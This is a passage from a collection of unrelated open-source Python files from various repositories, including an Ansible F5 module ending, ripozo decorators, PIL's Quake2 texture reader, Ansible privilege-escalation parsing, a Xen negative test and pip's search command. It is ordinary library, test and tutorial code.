'inherit', 'pool', 'any', 'none']
),
prober_pool=dict()
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
|
theofilis/tutorial-rabbitMQ | refs/heads/master | code/lesson3/receive_logs.py | 1 | # !/usr/bin/env python
__author__ = 'theofilis'
import pika
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='logs',
type='fanout')
result = channel.queue_declare(exclusive=True)
queue_name = result.method.queue
channel.queue_bind(exchange='logs',
queue=queue_name)
print ' [*] Waiting for logs. To exit press CTRL+C'
def callback(ch, method, properties, body):
print " [x] %r" % (body,)
channel.basic_consume(callback,
queue=queue_name,
no_ack=True)
channel.start_consuming() |
gustavla/self-supervision | refs/heads/master | selfsup/multi/methods/__init__.py | 1 | from __future__ import division, print_function, absolute_import
from .rot90 import Rot90
from .colorize_hypercolumn import ColorizeHypercolumn
from .colorize_hypercolumn2 import ColorizeHypercolumn2
from .colorize_hypercolumn3 import ColorizeHypercolumn3
from .video_saliency import VideoSaliency
from .video_saliency_hypercolumn import VideoSaliencyHypercolumn
from .video_relative_flow import VideoRelativeFlow
from .jigsaw import Jigsaw
from .autoencoder import Autoencoder
from .supervised import Supervised
|
tovrstra/horton | refs/heads/master | horton/test/test_log.py | 4 | # -*- coding: utf-8 -*-
# HORTON: Helpful Open-source Research TOol for N-fermion systems.
# Copyright (C) 2011-2017 The HORTON Development Team
#
# This file is part of HORTON.
#
# HORTON is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# HORTON is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
from horton import * # pylint: disable=wildcard-import,unused-wildcard-import
def test_recursive_timer():
@timer.with_section('Foo')
def factorial(n):
if n <= 1:
return 1
else:
return factorial(n-1)*n
assert factorial(4) == 24
|
mmmaaaxxx77/Python-Django-AdminLTE2 | refs/heads/master | HypermediaDemo/apps/ripozo/CustomDecorators.py | 1 | """
Contains the critical decorators for ripozo.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from functools import wraps, update_wrapper
import logging
import warnings
import six
_logger = logging.getLogger(__name__)
class ClassPropertyDescriptor(object):
"""
Straight up stolen from stack overflow
Implements class level properties
http://stackoverflow.com/questions/5189699/how-can-i-make-a-class-property-in-python
"""
def __init__(self, fget, fset=None):
self.fget = fget
self.fset = fset
def __get__(self, obj, klass=None):
if klass is None:
klass = type(obj)
return self.fget.__get__(obj, klass)()
def classproperty(func):
"""
Using this decorator a class can have a property.
Necessary for dynamically settings urls
on the application. Works exactly the same
as a normal property except the class can be the
argument instead of self.
.. code-block:: python
class MyClass(object):
@classproperty
def my_prop(cls):
return cls.__name__
>>> MyClass.my_prop
'MyClass'
:param func: The function to wrap
:type func: function
:rtype: ClassPropertyDescriptor
"""
if not isinstance(func, (classmethod, staticmethod)):
func = classmethod(func)
return ClassPropertyDescriptor(func)
class _apiclassmethod(object):
"""
A special version of classmethod that allows
the user to decorate classmethods and vice versa.
There is some hacky shit going on in here. However,
it allows an arbitrary number of @apimethod decorators
and @translate decorators which is key.
"""
__name__ = str('_apiclassmethod')
def __init__(self, func):
"""
Initializes the class method.
:param types.FunctionType func: The function to decorate.
"""
update_wrapper(self, func)
for key, value in six.iteritems(getattr(func, 'func_dict', {})):
self.__dict__[key] = value
self.func = func
if hasattr(func, 'func_name'):
self.func_name = func.func_name
def __get__(self, obj, klass=None):
"""
A getter that automatically injects the
class as the first argument.
"""
if klass is None:
klass = type(obj)
@wraps(self.func)
def newfunc(*args):
"""
Figures out if an instance was called
and if so it injects the class instead
of the instance.
"""
if len(args) == 0 or not isinstance(args[0], type):
return self.func(klass, *args)
return self.func(*args)
return newfunc
def __call__(self, cls, *args, **kwargs):
"""
This is where the magic happens.
"""
return self.__get__(None, klass=cls)(*args, **kwargs)
class apimethod(object):
"""
Decorator for declaring routes on a ripozo resource.
Any method in a ResourceBase subclass that is decorated
with this decorator will be exposed as an endpoint in
the greater application. Although an apimethod can be
decorated with another apimethod, this is not recommended.
Any method decorated with apimethod should return a ResourceBase
instance (or a subclass of it).
"""
def __init__(self, route='', endpoint=None, methods=None, no_pks=False, **options):
"""
Initialize the decorator. These are the options for the endpoint
that you are constructing. It determines what url's will be
handled by the decorated method.
.. code-block:: python
class MyResource(ResourceBase):
@apimethod(route='/myroute', methods=['POST', 'PUT']
def my_method(cls, request):
# ... Do something to handle the request and generate
# the MyResource instance.
:param str|unicode route: The route for endpoint. This will
be appended to the base_url for the ResourceBase subclass
when constructing the actual route.
:param str|unicode endpoint: The name of the endpoint. Defaults
to the function name.
:param list[str|unicode] methods: A list of the accepted http methods
for this endpoint. Defaults to ['GET']
:param bool no_pks: If this flag is set to True the ResourceBase
subclass's base_url_sans_pks property will be used instead
of the base_url. This is necessary for List endpoints where
the pks are not part of the url.
:param dict options: Additionaly arguments to pass to the dispatcher
that is registering the route with the application. This is
dependent on the individual dispatcher and web framework that
you are using.
"""
_logger.info('Initializing apimethod route: %s with options %s', route, options)
self.route = route
if not methods:
methods = ['GET']
self.options = options
self.options['methods'] = methods
self.options['no_pks'] = no_pks
self.endpoint = endpoint
def __call__(self, func):
"""
The actual decorator that will be called and returns the method
that is a ripozo route.
In addition to setting some properties on the function itself
(i.e. ``__rest_route__`` and ``routes``), It also wraps the actual
function calling both the preprocessors and postprocessors.
preprocessors get at least the cls, name of the function, request as arguments
postprocessors get the cls, function name, request and resource as arguments
:param classmethod f:
:return: The wrapped classmethod that is an action
that can be performed on the resource. For example,
any sort of CRUD action.
:rtype: classmethod
"""
setattr(func, '__rest_route__', True)
routes = getattr(func, 'routes', [])
routes.append((self.route, self.endpoint, self.options))
setattr(func, 'routes', routes)
@_apiclassmethod
@wraps(func)
def wrapped(cls, request, *args, **kwargs):
"""
Runs the preo/postprocessors
"""
for proc in cls.preprocessors:
proc(cls, func.__name__, request, *args, **kwargs)
resource = func(cls, request, *args, **kwargs)
for proc in cls.postprocessors:
proc(cls, func.__name__, request, resource, *args, **kwargs)
return resource
return wrapped
class translate(object):
"""
Decorator for validating the inputs to an apimethod
and describing what is allowed for that apimethod to
an adapter if necessary.
"""
def __init__(self, fields=None, skip_required=False,
validate=False, manager_field_validators=False):
"""
Initializes the decorator with the necessary fields.
the fields should be instances of FieldBase and should
give descriptions of the parameter and how to input them
(i.e. query or body parameter)
:param list fields: A list of FieldBase instances (or subclasses
of FieldBase).
:param bool skip_required: If this flag is set to True,
then required fields will be considered optional. This
is useful for an update when using the manager_field_validators
as this allows the user to skip over required fields like
the primary keys which should not be required in the updated
arguments.
:param bool validate: Indicates whether the validations should
be run. If it is False, it will only translate the fields.
:param bool manager_field_validators: (Deprecated: will be removed
in v2) A flag indicating that the fields from the Resource's
manager should be used.
"""
self.original_fields = fields or []
self.skip_required = skip_required
self.validate = validate
self.manager_field_validators = manager_field_validators
if manager_field_validators:
warnings.warn('The manager_field_validators attribute will be'
' removed in version 2.0.0. Please use the '
'"ripozo.decorators.manager_translate decorator"',
PendingDeprecationWarning)
self.cls = None
def __call__(self, func):
"""
Wraps the function with translation and validation.
This allows the inputs to be cast and validated as necessary.
Additionally, it provides the adapter with information about
what is necessary to successfully make a request to the wrapped
apimethod.
:param method f:
:return: The wrapped function
:rtype: function
"""
@_apiclassmethod
@wraps(func)
def action(cls, request, *args, **kwargs):
"""
Gets and translates/validates the fields.
"""
# TODO This is so terrible. I really need to fix this.
from ripozo.resources.fields.base import translate_fields
translate_fields(request, self.fields(cls.manager),
skip_required=self.skip_required, validate=self.validate)
return func(cls, request, *args, **kwargs)
action.__manager_field_validators__ = self.manager_field_validators
action.fields = self.fields
return action
def fields(self, manager):
"""
Gets the fields from the manager if necessary.
"""
if self.manager_field_validators:
return self.original_fields + manager.field_validators
return self.original_fields
class manager_translate(object):
"""
A special case translation and validation for using managers.
Performs the same actions as ripozo.decorators.translate
but it inspects the manager to get the resources necessary.
Additionally, you can tell it what fields to get from the manager
via the fields_attr. This will look up the fields on the manager
to return.
"""
def __init__(self, fields=None, skip_required=False,
validate=False, fields_attr='fields'):
"""A special case translation that inspects the manager
to get the relevant fields. This is purely for ease of use
and may not be maintained
:param list[ripozo.resources.fields.base.BaseField] fields: A
list of fields to translate
:param bool skip_required: If true, it will not require
any of the fields. Only relevant when validate is True
:param bool validate: A flag that indicates whether validation
should occur.
:param str|unicode fields_attr: The name of the attribute
to access on the manager to get the fields that are necessary.
e.g. `'create_fields'`, `'list_fields'` or whatever you want.
The attribute should be a list of strings
"""
self.original_fields = fields or []
self.skip_required = skip_required
self.validate = validate
self.fields_attr = fields_attr
self.cls = None
def __call__(self, func):
"""
Wraps the function with translation and validation.
This allows the inputs to be cast and validated as necessary.
Additionally, it provides the adapter with information about
what is necessary to successfully make a request to the wrapped
apimethod.
:param method f:
:return: The wrapped function
:rtype: function
"""
@_apiclassmethod
@wraps(func)
def action(cls, request, *args, **kwargs):
"""
Gets and translates/validates the fields.
"""
# TODO This is so terrible. I really need to fix this.
from ripozo.resources.fields.base import translate_fields
translate_fields(request, self.fields(cls.manager),
skip_required=self.skip_required, validate=self.validate)
return func(cls, request, *args, **kwargs)
action.__manager_field_validators__ = True
action.fields = self.fields
return action
def fields(self, manager):
"""
Gets the fields from the manager
:param ripozo.manager_base.BaseManager manager:
"""
manager_fields = []
for field in manager.field_validators:
if field.name in getattr(manager, self.fields_attr):
manager_fields.append(field)
return self.original_fields + manager_fields
|
knightingal/git_fav | refs/heads/master | git_proxy/tests.py | 24123 | from django.test import TestCase
# Create your tests here.
|
smi96/django-blog_website | refs/heads/master | lib/python2.7/site-packages/PIL/WalImageFile.py | 19 | # encoding: utf-8
#
# The Python Imaging Library.
# $Id$
#
# WAL file handling
#
# History:
# 2003-04-23 fl created
#
# Copyright (c) 2003 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
# NOTE: This format cannot be automatically recognized, so the reader
# is not registered for use with Image.open(). To open a WAL file, use
# the WalImageFile.open() function instead.
# This reader is based on the specification available from:
# http://www.flipcode.com/archives/Quake_2_BSP_File_Format.shtml
# and has been tested with a few sample files found using google.
from __future__ import print_function
from PIL import Image, _binary
try:
import builtins
except ImportError:
import __builtin__
builtins = __builtin__
i32 = _binary.i32le
##
# Load texture from a Quake2 WAL texture file.
# <p>
# By default, a Quake2 standard palette is attached to the texture.
# To override the palette, use the <b>putpalette</b> method.
#
# @param filename WAL file name, or an opened file handle.
# @return An image instance.
def open(filename):
# FIXME: modify to return a WalImageFile instance instead of
# plain Image object ?
if hasattr(filename, "read"):
fp = filename
else:
fp = builtins.open(filename, "rb")
# read header fields
header = fp.read(32+24+32+12)
size = i32(header, 32), i32(header, 36)
offset = i32(header, 40)
# load pixel data
fp.seek(offset)
im = Image.frombytes("P", size, fp.read(size[0] * size[1]))
im.putpalette(quake2palette)
im.format = "WAL"
im.format_description = "Quake2 Texture"
# strings are null-terminated
im.info["name"] = header[:32].split(b"\0", 1)[0]
next_name = header[56:56+32].split(b"\0", 1)[0]
if next_name:
im.info["next_name"] = next_name
return im
quake2palette = (
# default palette taken from piffo 0.93 by Hans Häggström
b"\x01\x01\x01\x0b\x0b\x0b\x12\x12\x12\x17\x17\x17\x1b\x1b\x1b\x1e"
b"\x1e\x1e\x22\x22\x22\x26\x26\x26\x29\x29\x29\x2c\x2c\x2c\x2f\x2f"
b"\x2f\x32\x32\x32\x35\x35\x35\x37\x37\x37\x3a\x3a\x3a\x3c\x3c\x3c"
b"\x24\x1e\x13\x22\x1c\x12\x20\x1b\x12\x1f\x1a\x10\x1d\x19\x10\x1b"
b"\x17\x0f\x1a\x16\x0f\x18\x14\x0d\x17\x13\x0d\x16\x12\x0d\x14\x10"
b"\x0b\x13\x0f\x0b\x10\x0d\x0a\x0f\x0b\x0a\x0d\x0b\x07\x0b\x0a\x07"
b"\x23\x23\x26\x22\x22\x25\x22\x20\x23\x21\x1f\x22\x20\x1e\x20\x1f"
b"\x1d\x1e\x1d\x1b\x1c\x1b\x1a\x1a\x1a\x19\x19\x18\x17\x17\x17\x16"
b"\x16\x14\x14\x14\x13\x13\x13\x10\x10\x10\x0f\x0f\x0f\x0d\x0d\x0d"
b"\x2d\x28\x20\x29\x24\x1c\x27\x22\x1a\x25\x1f\x17\x38\x2e\x1e\x31"
b"\x29\x1a\x2c\x25\x17\x26\x20\x14\x3c\x30\x14\x37\x2c\x13\x33\x28"
b"\x12\x2d\x24\x10\x28\x1f\x0f\x22\x1a\x0b\x1b\x14\x0a\x13\x0f\x07"
b"\x31\x1a\x16\x30\x17\x13\x2e\x16\x10\x2c\x14\x0d\x2a\x12\x0b\x27"
b"\x0f\x0a\x25\x0f\x07\x21\x0d\x01\x1e\x0b\x01\x1c\x0b\x01\x1a\x0b"
b"\x01\x18\x0a\x01\x16\x0a\x01\x13\x0a\x01\x10\x07\x01\x0d\x07\x01"
b"\x29\x23\x1e\x27\x21\x1c\x26\x20\x1b\x25\x1f\x1a\x23\x1d\x19\x21"
b"\x1c\x18\x20\x1b\x17\x1e\x19\x16\x1c\x18\x14\x1b\x17\x13\x19\x14"
b"\x10\x17\x13\x0f\x14\x10\x0d\x12\x0f\x0b\x0f\x0b\x0a\x0b\x0a\x07"
b"\x26\x1a\x0f\x23\x19\x0f\x20\x17\x0f\x1c\x16\x0f\x19\x13\x0d\x14"
b"\x10\x0b\x10\x0d\x0a\x0b\x0a\x07\x33\x22\x1f\x35\x29\x26\x37\x2f"
b"\x2d\x39\x35\x34\x37\x39\x3a\x33\x37\x39\x30\x34\x36\x2b\x31\x34"
b"\x27\x2e\x31\x22\x2b\x2f\x1d\x28\x2c\x17\x25\x2a\x0f\x20\x26\x0d"
b"\x1e\x25\x0b\x1c\x22\x0a\x1b\x20\x07\x19\x1e\x07\x17\x1b\x07\x14"
b"\x18\x01\x12\x16\x01\x0f\x12\x01\x0b\x0d\x01\x07\x0a\x01\x01\x01"
b"\x2c\x21\x21\x2a\x1f\x1f\x29\x1d\x1d\x27\x1c\x1c\x26\x1a\x1a\x24"
b"\x18\x18\x22\x17\x17\x21\x16\x16\x1e\x13\x13\x1b\x12\x12\x18\x10"
b"\x10\x16\x0d\x0d\x12\x0b\x0b\x0d\x0a\x0a\x0a\x07\x07\x01\x01\x01"
b"\x2e\x30\x29\x2d\x2e\x27\x2b\x2c\x26\x2a\x2a\x24\x28\x29\x23\x27"
b"\x27\x21\x26\x26\x1f\x24\x24\x1d\x22\x22\x1c\x1f\x1f\x1a\x1c\x1c"
b"\x18\x19\x19\x16\x17\x17\x13\x13\x13\x10\x0f\x0f\x0d\x0b\x0b\x0a"
b"\x30\x1e\x1b\x2d\x1c\x19\x2c\x1a\x17\x2a\x19\x14\x28\x17\x13\x26"
b"\x16\x10\x24\x13\x0f\x21\x12\x0d\x1f\x10\x0b\x1c\x0f\x0a\x19\x0d"
b"\x0a\x16\x0b\x07\x12\x0a\x07\x0f\x07\x01\x0a\x01\x01\x01\x01\x01"
b"\x28\x29\x38\x26\x27\x36\x25\x26\x34\x24\x24\x31\x22\x22\x2f\x20"
b"\x21\x2d\x1e\x1f\x2a\x1d\x1d\x27\x1b\x1b\x25\x19\x19\x21\x17\x17"
b"\x1e\x14\x14\x1b\x13\x12\x17\x10\x0f\x13\x0d\x0b\x0f\x0a\x07\x07"
b"\x2f\x32\x29\x2d\x30\x26\x2b\x2e\x24\x29\x2c\x21\x27\x2a\x1e\x25"
b"\x28\x1c\x23\x26\x1a\x21\x25\x18\x1e\x22\x14\x1b\x1f\x10\x19\x1c"
b"\x0d\x17\x1a\x0a\x13\x17\x07\x10\x13\x01\x0d\x0f\x01\x0a\x0b\x01"
b"\x01\x3f\x01\x13\x3c\x0b\x1b\x39\x10\x20\x35\x14\x23\x31\x17\x23"
b"\x2d\x18\x23\x29\x18\x3f\x3f\x3f\x3f\x3f\x39\x3f\x3f\x31\x3f\x3f"
b"\x2a\x3f\x3f\x20\x3f\x3f\x14\x3f\x3c\x12\x3f\x39\x0f\x3f\x35\x0b"
b"\x3f\x32\x07\x3f\x2d\x01\x3d\x2a\x01\x3b\x26\x01\x39\x21\x01\x37"
b"\x1d\x01\x34\x1a\x01\x32\x16\x01\x2f\x12\x01\x2d\x0f\x01\x2a\x0b"
b"\x01\x27\x07\x01\x23\x01\x01\x1d\x01\x01\x17\x01\x01\x10\x01\x01"
b"\x3d\x01\x01\x19\x19\x3f\x3f\x01\x01\x01\x01\x3f\x16\x16\x13\x10"
b"\x10\x0f\x0d\x0d\x0b\x3c\x2e\x2a\x36\x27\x20\x30\x21\x18\x29\x1b"
b"\x10\x3c\x39\x37\x37\x32\x2f\x31\x2c\x28\x2b\x26\x21\x30\x22\x20"
)
|
funson/rt-xen | refs/heads/master | tools/xm-test/tests/destroy/06_destroy_dom0_neg.py | 42 | #!/usr/bin/python
# Copyright (C) International Business Machines Corp., 2005
# Author: Li Ge <[email protected]>
import re
from XmTestLib import *
status, output = traceCommand("xm destroy 0")
if status == 0:
FAIL("xm destroy returned bad status, expected non 0, status is: %i" % status)
elif not re.search("Error", output, re.I):
FAIL("xm destroy returned bad output, expected Error:, output is: %s" % output)
|
Open-Plus/opgui | refs/heads/master | tests/events.py | 80 | import time
import tests
recorded_events = [ ]
def event(self, name, args, kwargs):
global recorded_events
print "*EVENT*", time.time(), self, name, args, kwargs
recorded_events.append((time.time(), self, name, args, kwargs))
def eventfnc(f):
name = f.__name__
def wrapper(self, *args, **kwargs):
event(self, name, args, kwargs)
return f(self, *args, **kwargs)
return wrapper
def get_events():
global recorded_events
r = recorded_events
recorded_events = [ ]
return r
def start_log():
global base_time
base_time = time.time()
def end_log(test_name):
global base_time
results = ""
for (t, self, method, args, kwargs) in get_events():
results += "%s T+%f: %s::%s(%s, *%s, *%s)\n" % (time.ctime(t), t - base_time, str(self.__class__), method, self, args, kwargs)
expected = None
try:
f = open(test_name + ".results", "rb")
expected = f.read()
f.close()
except:
print "NO TEST RESULT FOUND, creating new"
f = open(test_name + ".new_results", "wb")
f.write(results)
f.close()
print results
if expected is not None:
print "expected:"
if expected != results:
f = open(test_name + ".bogus_results", "wb")
f.write(results)
f.close()
raise tests.TestError("test data does not match")
else:
print "test compared ok"
else:
print "no test data to compare with."
def log(fnc, base_time = 0, test_name = "test", *args, **kwargs):
import fake_time
fake_time.setTime(base_time)
start_log()
try:
fnc(*args, **kwargs)
event(None, "test_completed", [], {"test_name": test_name})
except tests.TestError,c:
event(None, "test_failed", [], {"test_name": test_name, "reason": str(c)})
end_log(test_name)
|
lmregus/Portfolio | refs/heads/master | python/design_patterns/env/lib/python3.7/site-packages/docutils/languages/fr.py | 52 | # $Id: fr.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: Stefane Fermigier <[email protected]>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
French-language mappings for language-dependent features of Docutils.
"""
__docformat__ = 'reStructuredText'
labels = {
'author': 'Auteur',
'authors': 'Auteurs',
'organization': 'Organisation',
'address': 'Adresse',
'contact': 'Contact',
'version': 'Version',
'revision': 'R\u00e9vision',
'status': 'Statut',
'date': 'Date',
'copyright': 'Copyright',
'dedication': 'D\u00e9dicace',
'abstract': 'R\u00e9sum\u00e9',
'attention': 'Attention!',
'caution': 'Avertissement!',
'danger': '!DANGER!',
'error': 'Erreur',
'hint': 'Indication',
'important': 'Important',
'note': 'Note',
'tip': 'Astuce',
'warning': 'Avis',
'contents': 'Sommaire'}
"""Mapping of node class name to label text."""
bibliographic_fields = {
'auteur': 'author',
'auteurs': 'authors',
'organisation': 'organization',
'adresse': 'address',
'contact': 'contact',
'version': 'version',
'r\u00e9vision': 'revision',
'statut': 'status',
'date': 'date',
'copyright': 'copyright',
'd\u00e9dicace': 'dedication',
'r\u00e9sum\u00e9': 'abstract'}
"""French (lowcased) to canonical name mapping for bibliographic fields."""
author_separators = [';', ',']
"""List of separator strings for the 'Authors' bibliographic field. Tried in
order."""
|
juanalfonsopr/odoo | refs/heads/8.0 | addons/hr_timesheet_sheet/report/__init__.py | 342 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import hr_timesheet_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
total-impact/total-impact-webapp | refs/heads/master | totalimpactwebapp/refresh_status.py | 2 | from totalimpactwebapp import db
from util import cached_property
from util import commit
from util import dict_from_dir
import logging
logger = logging.getLogger("ti.refresh_status")
def save_profile_refresh_status(profile, status_string):
profile.refresh_status = status_string
db.session.add(profile)
commit(db)
class RefreshStatus(object):
states = {
"PROGRESS_BAR": "progress bar",
"CRUNCHING": "crunching",
"ALL_DONE": "all done"
}
def __init__(self, profile):
self.profile = profile
self.products = profile.display_products
@property
def refresh_state(self):
return self.profile.refresh_status
@property
def is_done_refreshing(self):
return self.num_refreshing==0
@property
def num_refreshing(self):
return sum([product.is_refreshing for product in self.products])
@property
def num_complete(self):
return len(self.products) - self.num_refreshing
# @property
# def product_problem_statuses(self):
# product_problem_statuses = [(product.tiid, product.last_refresh_status) for product in self.products if not product.finished_successful_refresh]
# return product_problem_statuses
# @property
# def product_refresh_failure_messages(self):
# failure_messages = [(product.tiid, product.last_refresh_failure_message) for product in self.products if product.last_refresh_failure_message]
# return failure_messages
@property
def percent_complete(self):
try:
precise = float(self.num_complete) / len(self.products) * 100
except ZeroDivisionError:
precise = 100
return int(precise)
def to_dict(self):
attributes_to_exclude = [
"states",
"products",
"profile"
]
return dict_from_dir(self, attributes_to_exclude)
|
DrDub/pilas | refs/heads/master | pilasengine/tareas/tarea.py | 6 | # -*- encoding: utf-8 -*-
# pilas engine: un motor para hacer videojuegos
#
# Copyright 2010-2014 - Hugo Ruscitti
# License: LGPLv3 (see http://www.gnu.org/licenses/lgpl.html)
#
# Website - http://www.pilas-engine.com.ar
from pilasengine.actores.actor import ActorEliminadoException
class Tarea(object):
def __init__(self, planificador, pilas, una_vez, time_out, dt, funcion,
*args, **kwargs):
"""Representa una tarea que se puede ejecutar dentro del planificador.
:param time_out: El tiempo absoluto para ejecutar la tarea.
:param dt: La frecuencia de ejecución.
:param funcion: La funcion a invocar.
:param parametros: Una lista de argumentos para la funcion anterior.
:param una_vez: Indica si la funcion se tiene que ejecutar una sola vez.
"""
self.planificador = planificador
self.una_vez = una_vez
self.time_out = time_out
self.dt = dt
self.funcion = funcion
self.args, self.kwargs = args, kwargs
self.pilas = pilas
def ejecutar(self):
"Ejecuta la tarea."
try:
return self.funcion(*self.args, **self.kwargs)
except ActorEliminadoException:
self.pilas.log("Se evitó ejecutar la tarea sobre un actor eliminado...")
def eliminar(self):
"Quita la tarea del planificador para que no se vuelva a ejecutar."
self.planificador.eliminar_tarea(self)
def terminar(self):
"Termina la tarea (alias de eliminar)."
self.eliminar() |
g-k/servo | refs/heads/master | tests/wpt/web-platform-tests/webdriver/runtests.py | 212 | import unittest
from unittest import TestLoader, TextTestRunner, TestSuite
if __name__ == "__main__":
loader = TestLoader()
suite = TestSuite((
loader.discover(".", pattern="*.py")
))
runner = TextTestRunner(verbosity=2)
runner.run(suite)
unittest.main()
|
scw/ansible | refs/heads/devel | lib/ansible/playbook/become.py | 150 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleParserError
from ansible.playbook.attribute import Attribute, FieldAttribute
#from ansible.utils.display import deprecated
class Become:
# Privlege escalation
_become = FieldAttribute(isa='bool')
_become_method = FieldAttribute(isa='string')
_become_user = FieldAttribute(isa='string')
def __init__(self):
return super(Become, self).__init__()
def _detect_privilege_escalation_conflict(self, ds):
# Fail out if user specifies conflicting privilege escalations
has_become = 'become' in ds or 'become_user'in ds
has_sudo = 'sudo' in ds or 'sudo_user' in ds
has_su = 'su' in ds or 'su_user' in ds
if has_become:
msg = 'The become params ("become", "become_user") and'
if has_sudo:
raise AnsibleParserError('%s sudo params ("sudo", "sudo_user") cannot be used together' % msg)
elif has_su:
raise AnsibleParserError('%s su params ("su", "su_user") cannot be used together' % msg)
elif has_sudo and has_su:
raise AnsibleParserError('sudo params ("sudo", "sudo_user") and su params ("su", "su_user") cannot be used together')
def _preprocess_data_become(self, ds):
"""Preprocess the playbook data for become attributes
This is called from the Base object's preprocess_data() method which
in turn is called pretty much anytime any sort of playbook object
(plays, tasks, blocks, etc) are created.
"""
self._detect_privilege_escalation_conflict(ds)
# Privilege escalation, backwards compatibility for sudo/su
if 'sudo' in ds or 'sudo_user' in ds:
ds['become_method'] = 'sudo'
if 'sudo' in ds:
ds['become'] = ds['sudo']
del ds['sudo']
else:
ds['become'] = True
if 'sudo_user' in ds:
ds['become_user'] = ds['sudo_user']
del ds['sudo_user']
#deprecated("Instead of sudo/sudo_user, use become/become_user and set become_method to 'sudo' (default)")
elif 'su' in ds or 'su_user' in ds:
ds['become_method'] = 'su'
if 'su' in ds:
ds['become'] = ds['su']
del ds['su']
else:
ds['become'] = True
if 'su_user' in ds:
ds['become_user'] = ds['su_user']
del ds['su_user']
#deprecated("Instead of su/su_user, use become/become_user and set become_method to 'su' (default is sudo)")
# if we are becoming someone else, but some fields are unset,
# make sure they're initialized to the default config values
if ds.get('become', False):
if ds.get('become_method', None) is None:
ds['become_method'] = C.DEFAULT_BECOME_METHOD
if ds.get('become_user', None) is None:
ds['become_user'] = C.DEFAULT_BECOME_USER
return ds
def _get_attr_become(self):
'''
Override for the 'become' getattr fetcher, used from Base.
'''
if hasattr(self, '_get_parent_attribute'):
return self._get_parent_attribute('become')
else:
return self._attributes['become']
def _get_attr_become_method(self):
'''
Override for the 'become_method' getattr fetcher, used from Base.
'''
if hasattr(self, '_get_parent_attribute'):
return self._get_parent_attribute('become_method')
else:
return self._attributes['become_method']
def _get_attr_become_user(self):
'''
Override for the 'become_user' getattr fetcher, used from Base.
'''
if hasattr(self, '_get_parent_attribute'):
return self._get_parent_attribute('become_user')
else:
return self._attributes['become_user']
|
abhishekjairath/codeyard | refs/heads/master | commit/lib/python2.7/site-packages/pip/commands/search.py | 344 | import sys
import textwrap
import pip.download
from pip.basecommand import Command, SUCCESS
from pip.util import get_terminal_size
from pip.log import logger
from pip.backwardcompat import xmlrpclib, reduce, cmp
from pip.exceptions import CommandError
from pip.status_codes import NO_MATCHES_FOUND
from pip._vendor import pkg_resources
from distutils.version import StrictVersion, LooseVersion
class SearchCommand(Command):
"""Search for PyPI packages whose name or summary contains <query>."""
name = 'search'
usage = """
%prog [options] <query>"""
summary = 'Search PyPI for packages.'
def __init__(self, *args, **kw):
super(SearchCommand, self).__init__(*args, **kw)
self.cmd_opts.add_option(
'--index',
dest='index',
metavar='URL',
default='https://pypi.python.org/pypi',
help='Base URL of Python Package Index (default %default)')
self.parser.insert_option_group(0, self.cmd_opts)
def run(self, options, args):
if not args:
raise CommandError('Missing required argument (search query).')
query = args
index_url = options.index
pypi_hits = self.search(query, index_url)
hits = transform_hits(pypi_hits)
terminal_width = None
if sys.stdout.isatty():
terminal_width = get_terminal_size()[0]
print_results(hits, terminal_width=terminal_width)
if pypi_hits:
return SUCCESS
return NO_MATCHES_FOUND
def search(self, query, index_url):
pypi = xmlrpclib.ServerProxy(index_url)
hits = pypi.search({'name': query, 'summary': query}, 'or')
return hits
def transform_hits(hits):
"""
The list from pypi is really a list of versions. We want a list of
packages with the list of versions stored inline. This converts the
list from pypi into one we can use.
"""
packages = {}
for hit in hits:
name = hit['name']
summary = hit['summary']
version = hit['version']
score = hit['_pypi_ordering']
if score is None:
score = 0
if name not in packages.keys():
packages[name] = {'name': name, 'summary': summary, 'versions': [version], 'score': score}
else:
packages[name]['versions'].append(version)
# if this is the highest version, replace summary and score
if version == highest_version(packages[name]['versions']):
packages[name]['summary'] = summary
packages[name]['score'] = score
